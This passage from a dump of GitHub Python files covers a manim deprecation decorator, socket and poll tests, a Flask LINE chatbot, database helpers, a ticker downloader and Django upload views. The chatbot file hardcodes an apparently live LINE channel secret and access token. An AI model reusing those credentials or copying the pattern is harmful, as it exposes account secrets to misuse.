Callable:\n \"\"\"Decorator to mark parameters of a callable as deprecated.\n\n It can also be used to automatically redirect deprecated parameter values to their\n replacements.\n\n Parameters\n ----------\n params\n The parameters to be deprecated. Can consist of:\n\n * An iterable of strings, with each element representing a parameter to deprecate\n * A single string, with parameter names separated by commas or spaces.\n since\n The version or date since deprecation.\n until\n The version or date until removal of the deprecated callable.\n message\n The reason for why the callable has been deprecated.\n redirections\n A list of parameter redirections. Each redirection can be one of the following:\n\n * A tuple of two strings. The first string defines the name of the deprecated\n parameter; the second string defines the name of the parameter to redirect to,\n when attempting to use the first string.\n\n * A function performing the mapping operation. The parameter names of the\n function determine which parameters are used as input. The function must\n return a dictionary which contains the redirected arguments.\n\n Redirected parameters are also implicitly deprecated.\n\n Returns\n -------\n Callable\n The decorated callable.\n\n Raises\n ------\n ValueError\n If no parameters are defined (neither explicitly nor implicitly).\n ValueError\n If defined parameters are invalid python identifiers.\n\n Examples\n --------\n Basic usage::\n\n from manim.utils.deprecation import deprecated_params\n\n @deprecated_params(params=\"a, b, c\")\n def foo(**kwargs):\n pass\n\n foo(x=2, y=3, z=4)\n # No warning\n\n foo(a=2, b=3, z=4)\n # WARNING The parameters a and b of method foo have been deprecated and may be removed in a later version.\n\n You can also specify additional information for a more precise warning::\n\n from manim.utils.deprecation import deprecated_params\n\n @deprecated_params(\n params=\"a, b, c\",\n since=\"v0.2\",\n until=\"v0.4\",\n message=\"The letters x, y, z are cooler.\"\n )\n def foo(**kwargs):\n pass\n\n foo(a=2)\n # WARNING The parameter a of method foo has been deprecated since v0.2 and is expected to be removed after v0.4. The letters x, y, z are cooler.\n\n Basic parameter redirection::\n\n from manim.utils.deprecation import deprecated_params\n\n @deprecated_params(redirections=[\n # Two ways to redirect one parameter to another:\n (\"old_param\", \"new_param\"),\n lambda old_param2: {\"new_param22\": old_param2}\n ])\n def foo(**kwargs):\n return kwargs\n\n foo(x=1, old_param=2)\n # WARNING The parameter old_param of method foo has been deprecated and may be removed in a later version.\n # returns {\"x\": 1, \"new_param\": 2}\n\n Redirecting using a calculated value::\n\n from manim.utils.deprecation import deprecated_params\n\n @deprecated_params(redirections=[\n lambda runtime_in_ms: {\"run_time\": runtime_in_ms / 1000}\n ])\n def foo(**kwargs):\n return kwargs\n\n foo(runtime_in_ms=500)\n # WARNING The parameter runtime_in_ms of method foo has been deprecated and may be removed in a later version.\n # returns {\"run_time\": 0.5}\n\n Redirecting multiple parameter values to one::\n\n from manim.utils.deprecation import deprecated_params\n\n @deprecated_params(redirections=[\n lambda buff_x=1, buff_y=1: {\"buff\": (buff_x, buff_y)}\n ])\n def foo(**kwargs):\n return kwargs\n\n foo(buff_x=2)\n # WARNING The parameter buff_x of method foo has been deprecated and may be removed in a later version.\n # returns {\"buff\": (2, 1)}\n\n Redirect one parameter to multiple::\n\n from manim.utils.deprecation import deprecated_params\n\n @deprecated_params(redirections=[\n lambda buff=1: {\"buff_x\": buff[0], \"buff_y\": buff[1]} if isinstance(buff, tuple)\n else {\"buff_x\": buff, \"buff_y\": buff}\n ])\n def foo(**kwargs):\n return kwargs\n\n foo(buff=0)\n # WARNING The parameter buff of method foo has been deprecated and may be removed in a later version.\n # returns {\"buff_x\": 0, buff_y: 0}\n\n foo(buff=(1,2))\n # WARNING The parameter buff of method foo has been deprecated and may be removed in a later version.\n # returns {\"buff_x\": 1, buff_y: 2}\n\n\n \"\"\"\n # Check if decorator is used without parenthesis\n if callable(params):\n raise ValueError(\"deprecate_parameters requires arguments to be specified.\")\n\n if params is None:\n params = []\n\n # Construct params list\n params = re.split(r\"[,\\s]+\", params) if isinstance(params, str) else list(params)\n\n # Add params which are only implicitly given via redirections\n if redirections is None:\n redirections = []\n for redirector in redirections:\n if isinstance(redirector, tuple):\n params.append(redirector[0])\n else:\n params.extend(list(inspect.signature(redirector).parameters))\n # Keep ordering of params so that warning message is consistently the same\n # This will also help pass unit testing\n params = list(dict.fromkeys(params))\n\n # Make sure params only contains valid identifiers\n identifier = re.compile(r\"^[^\\d\\W]\\w*\\Z\", re.UNICODE)\n if not all(re.match(identifier, param) for param in params):\n raise ValueError(\"Given parameter values are invalid.\")\n\n redirections = list(redirections)\n\n def warning_msg(func: Callable, used: list[str]):\n \"\"\"Generate the deprecation warning message.\n\n Parameters\n ----------\n func\n The callable with deprecated parameters.\n used\n The list of deprecated parameters used in a call.\n\n Returns\n -------\n str\n The deprecation message.\n \"\"\"\n what, name = _get_callable_info(func)\n plural = len(used) > 1\n parameter_s = \"s\" if plural else \"\"\n used_ = \", \".join(used[:-1]) + \" and \" + used[-1] if plural else used[0]\n has_have_been = \"have been\" if plural else \"has been\"\n deprecated = _deprecation_text_component(since, until, message)\n return f\"The parameter{parameter_s} {used_} of {what} {name} {has_have_been} {deprecated}\"\n\n def redirect_params(kwargs: dict, used: list[str]):\n \"\"\"Adjust the keyword arguments as defined by the redirections.\n\n Parameters\n ----------\n kwargs\n The keyword argument dictionary to be updated.\n used\n The list of deprecated parameters used in a call.\n \"\"\"\n for redirector in redirections:\n if isinstance(redirector, tuple):\n old_param, new_param = redirector\n if old_param in used:\n kwargs[new_param] = kwargs.pop(old_param)\n else:\n redirector_params = list(inspect.signature(redirector).parameters)\n redirector_args = {}\n for redirector_param in redirector_params:\n if redirector_param in used:\n redirector_args[redirector_param] = kwargs.pop(redirector_param)\n if len(redirector_args) > 0:\n kwargs.update(redirector(**redirector_args))\n\n def deprecate_params(func, *args, **kwargs):\n \"\"\"The actual decorator function used to extend the callables behavior.\n\n Logs a warning message when a deprecated parameter is used and redirects it if\n specified.\n\n Parameters\n ----------\n func\n The callable to decorate.\n args\n The arguments passed to the given callable.\n kwargs\n The keyword arguments passed to the given callable.\n\n Returns\n -------\n Any\n The return value of the given callable when being passed the given\n arguments.\n\n \"\"\"\n used = []\n for param in params:\n if param in kwargs:\n used.append(param)\n\n if len(used) > 0:\n logger.warning(warning_msg(func, used))\n redirect_params(kwargs, used)\n return func(*args, **kwargs)\n\n return decorator(deprecate_params)\n","repo_name":"ManimCommunity/manim","sub_path":"manim/utils/deprecation.py","file_name":"deprecation.py","file_ext":"py","file_size_in_byte":15062,"program_lang":"python","lang":"en","doc_type":"code","stars":16609,"dataset":"github-code","pt":"94"} +{"seq_id":"1505955909","text":"from select import *\nfrom socket import *\nfrom time import sleep\n\ntcp_sock = socket()\ntcp_sock.bind((\"0.0.0.0\", 8090))\ntcp_sock.listen()\n\nudp_sock = socket(AF_INET, SOCK_DGRAM)\nudp_sock.bind((\"0.0.0.0\", 8888))\n\nf = open(\"test.txt\")\n\np = poll() # poll对象\np.register(tcp_sock, POLLIN) # 关注IO\n\np.register(f, POLLIN)\nprint(tcp_sock.fileno(), POLLIN)\nsleep(2)\n\nprint(f.fileno(),POLLIN)\nevents = p.poll()\nprint(events)\n","repo_name":"seabedforest/study","sub_path":"month02/day16/poll_test.py","file_name":"poll_test.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15124363354","text":"import unittest\nimport json\nfrom src.cms_visualizer.topography import (Topography, RectangularSource, RectangularTarget, RectangularObstacle,\n InvalidTopographyObjectException, DuplicateTopographyObjectIdException, TopographyReconstructionException,\n UndefinedTopographyObjectType)\n\n\nclass TopographyTest(unittest.TestCase):\n\n def test_topography_creation(self):\n topography = (\n Topography(width=200, height=200)\n .with_sources([RectangularSource(1, 5, 5, 1, 1)])\n .with_targets([RectangularTarget(2, 95, 95, 1, 1)])\n .with_obstacles([RectangularObstacle(3, 50, 50, 1, 1)])\n )\n self.assertIsInstance(topography, Topography)\n self.assertEqual(topography.width, 200)\n self.assertEqual(topography.height, 200)\n self.assertEqual(len(topography.sources), 1)\n self.assertEqual(len(topography.targets), 1)\n self.assertEqual(len(topography.obstacles), 1)\n\n def test_invalid_rect_source(self):\n with self.assertRaises(InvalidTopographyObjectException):\n Topography(width=100, height=100).with_sources(\n [RectangularSource(1, 105, 105, 1, 1)])\n\n def test_invalid_rect_target(self):\n with self.assertRaises(InvalidTopographyObjectException):\n Topography(width=100, height=100).with_targets(\n [RectangularTarget(1, -21, -21, 1, 1)])\n\n def test_invalid_rect_obstacle(self):\n with self.assertRaises(InvalidTopographyObjectException):\n Topography(width=100, height=100).with_obstacles(\n [RectangularObstacle(1, 5, 5, 0, 1)])\n\n def test_duplicate_id(self):\n with self.assertRaises(DuplicateTopographyObjectIdException):\n Topography(width=100, height=100).with_sources(\n [RectangularSource(1, 5, 5, 1, 1)]).with_targets(\n [RectangularTarget(1, 25, 25, 1, 1)])\n\n with self.assertRaises(DuplicateTopographyObjectIdException):\n Topography(width=100, height=100).with_targets(\n [RectangularTarget(1, 5, 5, 1, 1)]).with_sources(\n [RectangularSource(1, 25, 25, 1, 1)])\n\n with self.assertRaises(DuplicateTopographyObjectIdException):\n Topography(width=100, height=100).with_sources(\n [RectangularSource(1, 5, 5, 1, 1)]).with_obstacles(\n [RectangularObstacle(1, 25, 25, 1, 1)])\n\n def test_topography_creation_from_dict(self):\n with open('tests/valid_simulation.json') as f:\n simulation = json.load(f)\n\n topography = Topography.from_dict(simulation['topography'])\n self.assertIsInstance(topography, Topography)\n self.assertEqual(topography.width, 200)\n self.assertEqual(topography.height, 100)\n self.assertEqual(len(topography.sources), 1)\n self.assertEqual(len(topography.targets), 1)\n self.assertEqual(len(topography.obstacles), 2)\n\n def test_topography_creation_from_dict_missing_width_height(self):\n with self.assertRaises(TopographyReconstructionException):\n Topography.from_dict({\n 'sources': [],\n 'targets': [],\n 'obstacles': []\n })\n\n def test_topography_creation_from_dict_missing_objects(self):\n with self.assertRaises(TopographyReconstructionException):\n Topography.from_dict({\n 'targets': [],\n 'obstacles': []\n })\n with self.assertRaises(TopographyReconstructionException):\n Topography.from_dict({\n 'sources': [],\n 'obstacles': []\n })\n with self.assertRaises(TopographyReconstructionException):\n Topography.from_dict({\n 'targets': [],\n 'sources': []\n })\n\n def test_topography_creation_from_dict_unknown_type(self):\n with self.assertRaises(UndefinedTopographyObjectType):\n Topography.from_dict({\n \"targets\": [\n {\n \"id\": 1,\n \"x\": 5,\n \"y\": 5,\n \"radius\": 25,\n \"type\": \"CIRCLE\"\n }\n ],\n \"sources\": [],\n \"obstacles\": [],\n \"width\": 100,\n \"height\": 100\n })\n\n def test_topography_to_dict(self):\n topography = (\n Topography(width=200, height=200)\n .with_sources([RectangularSource(1, 5, 5, 1, 1)])\n .with_targets([RectangularTarget(2, 95, 95, 1, 1)])\n .with_obstacles([RectangularObstacle(3, 50, 50, 1, 1)])\n )\n topography_dict = topography.to_dict()\n self.assertEqual(topography_dict['width'], 200)\n self.assertEqual(topography_dict['sources'][0]['type'], 'RECTANGULAR')\n","repo_name":"gjke/cms-visualizer","sub_path":"tests/test_topography.py","file_name":"test_topography.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17910727223","text":"#!/usr/bin/python\n\nimport sys\nimport math\nimport json\nimport os\nimport traceback\n\n#environment specific\nclose_fds=False\n\nbase_path=os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(__file__)), '..'))\ndata_path=base_path+\"/data\"\nsystem_data_path=data_path+\"/system\"\nsamples_path=data_path+\"/samples\"\nupload_path=data_path+\"/uploaded\"\nthumbnail_image_path=upload_path+\"/thumbnail\"\nmetadata_path=data_path+\"/metadata\"\nmfcc_path=metadata_path+\"/mfcc\"\ntags_path=metadata_path+\"/tags\"\ncodebook_path=data_path+\"/codebooks/current\"\ntag_to_generate_codebook=True\n\nversion_path=\"v0.2\"\n#\nSYSTEM_USER_ID=\"0\"\nMAX_DATA_SIZE=256\nSIZE_CODEBOOK=128\n\n#dynamic VQ\ndvq_scheme_n=3\ndvq_scheme_a=[1/3,1/3] #the last one is inferred\n\npy_executable=sys.executable\nffmpeg=\"/usr/bin/ffmpeg\"\nthumbnail_image_type=\".jpeg\"\n\ntry:\n\turl = os.environ[\"REQUEST_URI\"] \n\tserver_addr=os.environ[\"SERVER_ADDR\"]\n\tserver_port=os.environ[\"SERVER_PORT\"]\n\tdownload_baseUrl=\"http://\"+server_addr+\":\"+server_port+\"/\"+version_path+\"/data/uploaded\"\nexcept:\n\tdownload_baseUrl=None\n\ttraceback.print_exc(file=sys.stderr)\n","repo_name":"liesheng/dog-emotion-detector","sub_path":"application/web/cgi-bin/app_config.py","file_name":"app_config.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"14073272755","text":"# encoding: utf-8\n\nimport os\n\n\n##########################################\n# Init db connection.\n##########################################\n\n\nconn = None\n\n\n# Remove the comment notations. Make a connenction to real db. [TODO_DB]\n\n\"\"\"\nimport psycopg2\nimport urllib.parse as urlparse\n\nurlparse.uses_netloc.append(\"postgres\")\nurl = urlparse.urlparse(os.environ[\"DATABASE_URL\"])\n\nconn = psycopg2.connect(\n database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n)\n\"\"\"\n\n\n##########################################\n# Init bot.\n##########################################\n\nfrom DataManager import DataManager\ndata_manager = DataManager(conn)\n\nfrom CianCianBot import CianCianBot\nbot = CianCianBot(data_manager)\n\n\n##########################################\n# Init flask backend and linebot facility.\n##########################################\n\nfrom flask import Flask, request, abort\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n)\n\napp = Flask(__name__)\n\nchannel_secret = 'd07d23b1fb9c10f9e2d638bf56856344'\nchannel_access_token = '6buiIgstKTe+PYLqN/jmy8MNjsn4qBSFr1IwYRLgb5x9BWtD6qPHLi/KVMCGB00ZbcSAJfjOByFezjQSL4IvdCb6wT12BwdbrZ+/zhDRthAsW967CMnh4W9zmntX2oYybmPjx4pk50e4dhnaTVUHHwdB04t89/1O/w1cDnyilFU='\nhandler = WebhookHandler(channel_secret)\nline_bot_api = LineBotApi(channel_access_token)\n\n\n@app.route('/')\ndef index():\n return \"

Hello World!

\"\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\n@handler.add(MessageEvent, message=TextMessage) # default\ndef handle_text_message(event): # default\n # User's message\n msg = event.message.text # message from user\n\n # User's chatting window id, could be `user_id`, `room_id`, `group_id`.\n if event.source.type == \"user\":\n src_id = event.source.user_id\n elif event.source.type == \"room\":\n src_id = event.source.room_id\n elif event.source.type == \"group\":\n src_id = event.source.group_id\n else:\n src_id = \"error\"\n unique_id = str(event.source.type) + \"_\" + src_id\n\n # Responding algorithm\n bot_response = bot.respond(msg, unique_id)\n\n # Reply\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=bot_response)\n )\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=os.environ['PORT'])\n","repo_name":"AliciaTsai/LineBot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"72663172468","text":"import os\nimport pymysql\nfrom flask import jsonify\n\ndb_user = os.environ.get('CLOUD_SQL_USERNAME')\ndb_password = os.environ.get('CLOUD_SQL_PASSWORD')\ndb_name = os.environ.get('CLOUD_SQL_DATABASE_NAME')\ndb_connection_name = os.environ.get('CLOUD_SQL_CONNECTION_NAME')\n\n\ndef open_connection():\n unix_socket = '/cloudsql/{}'.format(db_connection_name)\n try:\n if os.environ.get('GAE_ENV') == 'standard':\n conn = pymysql.connect(user=db_user, password=db_password,\n unix_socket=unix_socket, db=db_name,\n cursorclass=pymysql.cursors.DictCursor\n )\n except pymysql.MySQLError as e:\n print(e)\n\n return conn\n\n# Read all projects in DB front-end index it\ndef get_projects():\n conn = open_connection()\n with conn.cursor() as cursor:\n result = cursor.execute('SELECT * FROM PROJECTS;')\n projects = cursor.fetchall()\n if result > 0:\n got_projects = jsonify(projects)\n else:\n got_projects = 'No projects found in Database'\n conn.close()\n return got_projects\n\n\n# Create Survey Project\ndef add_projects(project):\n conn = open_connection()\n with conn.cursor() as cursor:\n cursor.execute('INSERT INTO PROJECTS (name, description, formData) VALUES(%s, %s, %s)', (project[\"name\"], project[\"description\"], project[\"formData\"]))\n conn.commit()\n conn.close()\n \n # Get User response by Selected ProjectID \ndef get_responses():\n conn = open_connection()\n with conn.cursor() as cursor:\n result = cursor.execute('SELECT * FROM USER_RESPONSES;')\n responses = cursor.fetchall()\n if result > 0:\n got_responses = jsonify(responses)\n else:\n got_responses = 'No user responses on database'\n conn.close()\n return got_responses\n\n\n# def get_responsesByProjectID():\n# conn = open_connection()\n# with conn.cursor() as cursor:\n# result = cursor.execute('SELECT USER_RESPONSES.responseData, USER_RESPONSES.ProjectID, PROJECTS.projectID FROM USER_RESPONSES INNER JOIN PROJECTS ON USER_RESPONSES.ProjectID=PROJECTS.projectID;')\n# responsesByID = cursor.fetchall()\n# if result > 0:\n# got_responses = jsonify(responsesByID)\n# else:\n# got_responses = 'No projects found in Database'\n# conn.close()\n# return got_responses\n\n\n# Submit response\ndef submit_response(response):\n conn = open_connection()\n with conn.cursor() as cursor:\n cursor.execute('INSERT INTO USER_RESPONSES (responseID, responseData, projectID) VALUES(%s, %s, %s)', (response[\"responseID\"],response[\"responseData\"], response[\"projectID\"]))\n conn.commit()\n conn.close()\n ","repo_name":"carolher/ChainedSurveyApp","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24611455356","text":"from django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\n\n\ndef validate_positive(value):\n if value < 0:\n raise ValidationError(\n _('%(value)s must be positive'),\n params={'value': value},\n )\n\n\ndef is_percent(value):\n if value < 0 and value > 100:\n raise ValidationError(\n _('%(value)s must be an integer between 0 and 100'),\n params={'value': value},\n )\n","repo_name":"Ircam-WAM/mezzanine-organization","sub_path":"organization/network/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"73813405749","text":"import csv\nimport os\nimport pandas as pd\nfrom yahoo_fin.stock_info import *\nfrom definitions import TICKERS_DIR\n\n\n\ndef download_ticker():\n file_date = datetime.datetime.utcnow()\n file_date = file_date.strftime(\"%Y%m%d\")\n\n file_name = 'all_tickers.csv'\n if os.path.exists(TICKERS_DIR + file_date + '_' + file_name):\n df_tickers = pd.read_csv(TICKERS_DIR + file_date + '_' + file_name)\n # print(df_tickers.columns)\n return df_tickers\n\n else:\n # download sp500 tickers\n sp500_tickers = tickers_sp500()\n file_sp500 = 'sp500_tickers.csv'\n if os.path.exists(TICKERS_DIR + file_date + '_' + file_sp500):\n df_sp500 = pd.read_csv(TICKERS_DIR + file_date + '_' + file_sp500)\n else:\n with open(TICKERS_DIR + file_date + '_' + file_sp500, mode='w') as ticker_file:\n ticker_writer = csv.writer(ticker_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n ticker_writer.writerow(sp500_tickers)\n df_sp500 = pd.DataFrame()\n df_sp500['ticker'] = sp500_tickers\n df_sp500['sp500'] = True\n\n # # download dow\n # dow_tickers = tickers_dow()\n # file_dow = 'dow_tickers.csv'\n # if os.path.exists(TICKERS_DIR + file_date + '_' + file_dow):\n # df_dow = pd.read_csv(TICKERS_DIR + file_date + '_' + file_dow)\n # else:\n # with open(TICKERS_DIR + file_date + '_' + file_dow, mode='w') as ticker_file:\n # ticker_writer = csv.writer(ticker_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n # ticker_writer.writerow(dow_tickers)\n # df_dow = pd.DataFrame()\n # df_dow['ticker'] = dow_tickers\n # df_dow['dow'] = True\n\n # download nasdaq\n nasdaq_tickers = tickers_nasdaq()\n file_nasdaq = 'nasdaq_tickers.csv'\n if os.path.exists(TICKERS_DIR + file_date + '_' + file_nasdaq):\n df_nasdaq = pd.read_csv(TICKERS_DIR + file_date + '_' + file_nasdaq)\n else:\n with open(TICKERS_DIR + file_date + '_' + file_nasdaq, mode='w') as ticker_file:\n ticker_writer = csv.writer(ticker_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n ticker_writer.writerow(nasdaq_tickers)\n df_nasdaq = pd.DataFrame()\n df_nasdaq['ticker'] = nasdaq_tickers\n\n # download others\n other_tickers = tickers_other()\n file_other = 'other_tickers.csv'\n if os.path.exists(TICKERS_DIR + file_date + '_' + file_other):\n df_other = pd.read_csv(TICKERS_DIR + file_date + '_' + file_other)\n else:\n with open(TICKERS_DIR + file_date + '_' + file_other, mode='w') as ticker_file:\n ticker_writer = csv.writer(ticker_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n ticker_writer.writerow(other_tickers)\n df_other = pd.DataFrame()\n df_other['ticker'] = other_tickers\n\n # tickers all\n # tickers = list(set().union(sp500_tickers, dow_tickers, nasdaq_tickers, other_tickers))\n tickers = list(set().union(sp500_tickers, nasdaq_tickers, other_tickers))\n\n df_tickers = pd.DataFrame()\n df_tickers['ticker'] = tickers\n # df_tickers['dow'] = df_tickers['ticker'].apply(lambda x: True if x in dow_tickers else False)\n df_tickers['sp500'] = df_tickers['ticker'].apply(lambda x: True if x in sp500_tickers else False)\n df_tickers['exchange'] = df_tickers['ticker'].apply(lambda x: 'nasdaq' if x in nasdaq_tickers else None)\n df_tickers = df_tickers.loc[df_tickers['ticker'].str.len() > 0]\n\n # write to csv\n file_name = 'all_tickers.csv'\n df_tickers.to_csv(TICKERS_DIR + file_date + '_' + file_name, index=False)\n\n # check\n print('number of total stocks: {}'.format(len(df_tickers['ticker'])))\n print('number of unique stocks: {}'.format(df_tickers['ticker'].nunique()))\n # print('number of stocks in DOW: {}'.format(len(df_tickers.loc[df_tickers['dow'] == True])))\n print('number of stocks in SP500: {}'.format(len(df_tickers.loc[df_tickers['sp500'] == True])))\n print('number of stocks in NASDAQ: {}'.format(len(df_tickers.loc[df_tickers['exchange'] == 'nasdaq'])))\n\n return df_tickers\n\nif __name__ == '__main__':\n download_ticker()\n","repo_name":"dark7wind/stock_fundamental_valuation","sub_path":"src/data/download_ticker.py","file_name":"download_ticker.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72572654708","text":"from django.contrib.auth import get_user_model\nfrom django.http import JsonResponse\nfrom django.db.utils import IntegrityError\n\nfrom rest_framework import viewsets\nfrom rest_framework import permissions\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.parsers import FileUploadParser, MultiPartParser\n\nUser = get_user_model()\n\nfrom apps.utils import hash_file\nfrom apps.api.permissions import UserIDPermission, WhiteListPermission\nfrom apps.api.serializers import AudioDocSerializer, DocSerializer\n\nfrom apps.docs.models import TextDocument\nfrom apps.docs.tasks import processa_textdoc_task\n\nfrom apps.audios.models import AudioDocument\nfrom apps.audios.tasks import processa_audiodoc_task\n\n\ndef root(request):\n return JsonResponse({\"projeto\": 'Sophia' })\n\nclass DocViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = TextDocument.objects.all()\n serializer_class = DocSerializer\n permission_classes = [\n permissions.IsAuthenticated\n & WhiteListPermission\n & UserIDPermission\n ]\n # parser_classes = [FileUploadParser]\n parser_classes = [MultiPartParser]\n\n @action(detail=True, methods=['get'])\n def status(self, request, *args, **kwargs):\n doc = self.get_object()\n\n return Response({\n 'processando': doc.processando,\n 'processado': doc.foi_processado,\n })\n\n def create(self, request):\n data = dict(request.data)\n\n if 'files' not in data:\n return Response({\n 'status': False,\n 'msg': 'Nenhum documento anexado encontrado'\n })\n\n resultado = []\n anexos = data['files']\n for anexo in anexos:\n\n if not anexo.content_type.startswith('audio') \\\n and not anexo.content_type.startswith('video'):\n\n api_userid = request.META.get('HTTP_X_API_USERID', None)\n hash_sha256 = hash_file(anexo)\n\n try:\n textdoc = TextDocument.objects.create(user=request.user, api_user=api_userid, hashfile=hash_sha256, file=anexo)\n\n textdoc.nome = anexo.name\n textdoc.size = anexo.size\n textdoc.filename = anexo.name\n textdoc.mime = anexo.content_type\n textdoc.ext = textdoc.file.name.split('.')[-1]\n # textdoc.save()\n\n resultado.append({\n 'filename': anexo.name,\n 'msg': 'Documento criado com sucesso'\n })\n except IntegrityError:\n resultado.append({\n 'filename': anexo.name,\n 'msg': 'Documento já existente para o usuário'\n })\n else:\n resultado.append({\n 'filename': anexo.name,\n 'msg': 'Rota não funciona para audios ou videos, favor consultar rota /audios'\n })\n\n return Response({\n 'status': True,\n 'msg': 'Consulta processada com sucesso',\n 'data': resultado\n })\n\n\n @action(detail=True, methods=['post'])\n def processa(self, request, *args, **kwargs):\n\n docid = kwargs['pk']\n textdoc = TextDocument.objects.filter(user__id=request.user.id, id=docid).first()\n\n if textdoc is None:\n return Response({ 'status': False, 'msg': 'Doc não encontrado' })\n\n if textdoc.foi_processado:\n return Response({ 'status': False, 'msg': 'Doc já processado', 'data': textdoc.id })\n\n if textdoc.processando:\n return Response({ 'status': False, 'msg': 'Doc está sendo processado', 'data': textdoc.id })\n\n textdoc.processando = True\n textdoc.save()\n\n processa_task = processa_textdoc_task.delay(userid=request.user.id, docid=docid)\n\n return Response({\n 'status': True,\n 'msg': 'Doc está sendo processado'\n\n })\n\nclass AudioDocViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = AudioDocument.objects.all()\n serializer_class = AudioDocSerializer\n permission_classes = [\n permissions.IsAuthenticated\n & WhiteListPermission\n & UserIDPermission\n ]\n parser_classes = [FileUploadParser]\n\n @action(detail=True, methods=['get'])\n def status(self, request, *args, **kwargs):\n doc = self.get_object()\n\n return Response({\n 'processando': doc.processando,\n 'processado': doc.foi_processado,\n })\n\n def create(self, request):\n\n if 'file' not in request.data:\n return Response({\n 'status': False,\n 'msg': 'Documento anexado não encontrado'\n })\n\n if not request.data['file'].content_type.startswith('audio') and \\\n not request.data['file'].content_type.startswith('video'):\n return Response({\n 'status': False,\n 'msg': 'Rota funciona apenas para audios ou videos, favor consultar outra rota.'\n })\n\n api_userid = request.META.get('HTTP_X_API_USERID', None)\n hash_sha256 = hash_file(request.data['file'])\n\n try:\n audiodoc = AudioDocument.objects.create(user=request.user, api_user=api_userid, hashfile=hash_sha256, file=request.data['file'])\n except IntegrityError:\n return Response({\n 'status': False,\n 'msg': 'Audio já existente para o usuário'\n })\n\n audiodoc.nome = request.data['file'].name\n audiodoc.size = audiodoc.file.size\n audiodoc.filename = request.data['file'].name\n audiodoc.mime = request.FILES['file'].content_type\n audiodoc.ext = audiodoc.file.name.split('.')[-1]\n audiodoc.save()\n\n return Response({\n 'status': True,\n 'msg': 'Audio criado com sucesso',\n 'data': audiodoc.id,\n })\n\n @action(detail=True, methods=['post'])\n def processa(self, request, *args, **kwargs):\n\n docid = kwargs['pk']\n audiodoc = AudioDocument.objects.filter(user__id=request.user.id, id=docid).first()\n\n if audiodoc is None:\n return Response({ 'status': False, 'msg': 'Audio não encontrado' })\n\n if audiodoc.foi_processado:\n return Response({ 'status': False, 'msg': 'Audio já processado', 'data': audiodoc.id })\n\n if audiodoc.processando:\n return Response({ 'status': False, 'msg': 'Audio está sendo processado', 'data': audiodoc.id })\n\n audiodoc.processando = True\n audiodoc.save()\n\n processa_task = processa_audiodoc_task.delay(userid=request.user.id, docid=docid)\n\n return Response({\n 'status': True,\n 'msg': 'Audio está sendo processado'\n })\n\n\n","repo_name":"acba/sophia","sub_path":"apps/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7074,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9580975446","text":"from fastapi.testclient import TestClient\nfrom models import Product_model\nfrom fastapi.encoders import jsonable_encoder\n\nfrom main import app\n\nclient = TestClient(app)\n\nroutes = \"\"\"path full name\n-------------------------------- ---------------------------------------------------------------\n/customers/all/ routes.customer.Customer_resource.r_get_customers\n/customers/filtered/{product_id} routes.customer.Customer_resource.r_get_customers_with_product\n/docs fastapi.applications.FastAPI.setup..swagger_ui_html\n/docs/oauth2-redirect fastapi.applications.FastAPI.setup..swagger_ui_redirect\n/openapi.json fastapi.applications.FastAPI.setup..openapi\n/products/all/ routes.product.Product_resource.r_get_products\n/products/create/ routes.product.Product_resource.r_add_product\n/products/delete/{id} routes.product.Product_resource.r_delete_product\n/products/edit/ routes.product.Product_resource.r_patch_product\n/products/filtered/{customer_id} routes.product.Product_resource.r_get_products_with_customer\n/redoc fastapi.applications.FastAPI.setup..redoc_html\"\"\"\n\n\ndef test_get_customers():\n response = client.get(\"/customers/all/\")\n assert response.status_code == 200\n\n\ndef test_get_products():\n response = client.get(\"/products/all/\")\n assert response.status_code == 200\n\n\ndef test_get_filtered_clients():\n response = client.get(\"/customers/filtered/1\")\n assert response.status_code == 200\n\n\ndef test_get_filtered_products():\n response = client.get(\"/products/filtered/1\")\n assert response.status_code == 200\n\n\ndef test_create_delete():\n '''post and delete'''\n response = client.get(\"/products/all\")\n start = response.json()\n 